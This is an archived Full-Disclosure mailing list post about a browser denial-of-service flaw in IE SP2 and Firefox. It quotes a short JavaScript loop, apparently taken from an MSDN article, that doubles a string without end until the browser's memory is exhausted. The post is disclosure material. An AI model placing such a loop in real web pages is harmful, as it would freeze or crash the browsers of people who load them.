full-disclosure - IE sp2 and Mozilla Firefox DoS.

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [<thread-prev] [day] [month] [year] [list]

From: se_cur_ity at hotmail.com (morning_wood)
Subject: IE sp2 and Mozilla Firefox DoS.

even Microsoft publishes PoC for browser DoS ( multi platform too )
see:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp

------ / snip / ------
var big_string = "double me up!";
while (true)
{
    big_string = big_string + big_string;   // 20 iterations equals all your
memory...
}
----- / snip / --------

kinda funny... unpatched too!
cheers,
m.w